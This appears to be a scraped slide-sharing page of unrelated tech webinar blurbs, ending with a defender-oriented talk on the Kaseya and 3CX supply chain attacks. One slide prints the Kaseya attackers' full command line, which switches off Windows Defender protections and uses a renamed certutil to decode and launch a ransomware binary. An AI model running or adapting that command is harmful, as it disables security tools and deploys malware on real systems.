This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
UiPath Test Automation using UiPath Test Suite series, part 6
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...Edge AI and Vision Alliance
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/building-and-scaling-ai-applications-with-the-nx-ai-manager-a-presentation-from-network-optix/
Robin van Emden, Senior Director of Data Science at Network Optix, presents the “Building and Scaling AI Applications with the Nx AI Manager,” tutorial at the May 2024 Embedded Vision Summit.
In this presentation, van Emden covers the basics of scaling edge AI solutions using the Nx tool kit. He emphasizes the process of developing AI models and deploying them globally. He also showcases the conversion of AI models and the creation of effective edge AI pipelines, with a focus on pre-processing, model conversion, selecting the appropriate inference engine for the target hardware and post-processing.
van Emden shows how Nx can simplify the developer’s life and facilitate a rapid transition from concept to production-ready applications.He provides valuable insights into developing scalable and efficient edge AI solutions, with a strong focus on practical implementation.HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
How to Get CNIC Information System with Paksim Ga.pptx
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Microsoft - Power Platform_G.Aspiotis.pdf
Revolutionizing Application Development
with AI-powered low-code, presentation by George Aspiotis, Sr. Partner Development Manager, Microsoft
TrustArc Webinar - 2024 Global Privacy Survey
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
20240607 QFM018 Elixir Reading List May 2024
Everything I found interesting about the Elixir programming ecosystem in May 2024
Recently uploaded (20)
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Supply Chain Attacks
- 2. #WHOAMI • Lionel Faleiro • Key Domains – Malware Analysis, Log Analysis, IR and Security Analytics, Training, Threat Intelligence • Gamer, Photographer • @sandmaxprime 2
- 3. Agenda 3 What are Supply Chain Attacks Attack Vectors In The News Anatomy of an Attack Defending against SCA
- 4. What are Supply Chain Attack 4 • Value chain attack / 3rd party attack • Compromise of enterprise networks -> via applications, 3rd part entities • Executed by APT groups • Who is the target?
- 5. Attack vectors 5 • Third party software providers • Data storage solutions • Development or testing platforms • Website services • Repositories
- 7. Anatomy of an Attack – Kaseya Ransomware 7 • Happened on July 2 2021 • Kaseya VSA servers were exploited to deploy ransomware downstream to users • Kaseya VSA Agent Hot-Fix <- Malicious task • Ransomware encryptor pushed agent.crt → agent.exe • Used DLL sideloading against Windows Defender -> Revil -> Registry Key • Were timed to encrypt at 1630 UTC • Around 60 customers and 1500+ businesses
- 8. Anatomy of an Attack – Kaseya Ransomware 8 "C:WINDOWSsystem32cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference - DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true - DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled - SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% > > C:Windowscert.exe & C:Windowscert.exe - decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe
- 9. Anatomy of an Attack – 3CX 9 • 3CX Desktop App • Software was compromised with Trojanized versions • Bundled malicious DLL -> ffmpeg.dll • EDR Alerts - March 29th • Content • Suddenicon -> downloaded encrypted icon files - https://github[.]com/IconStorages/images • Icon files had C2 -> Iconicstealer • Mandiant -> UNC4736 • Double supply chain attack => X_Trader -> VeiledSignal
- 10. Anatomy of an Attack – 3CX 10
- 11. Anatomy of an Attack – 3CX 11 • 3CX systems were infected with TaxHaul malware on Windows and SimpleSea on MacOS • Used Fast Reverse Proxy to move laterally
- 12. Anatomy of an Attack – 3CX 12
- 13. Anatomy of an Attack – 3CX 13 • Initial Response • Determine scope of exploited installs • Hunt for the IOCs – Connections to the domains and Hashes • Hunt for child processes of the Desktop App • Hunt for suspicious loading of the DLL files
- 14. Anatomy of an Attack – 3CX 14
- 15. Defending Against SCA 15 • Have security guidelines for suppliers • Vulnerability management system • Good software inventory • Enforce change control • Restricted access rights / controls • Identify alternatives / failover processes • Well defined SDLC and secure coding practices • Protect code and repositories
- 16. References 16 • https://www.enisa.europa.eu/publications/threat-landscape-for-supply-chain-attacks • https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_prog ress/ • https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise • https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to- iconic-incident/ • https://twitter.com/fr0gger_ • https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/ • https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/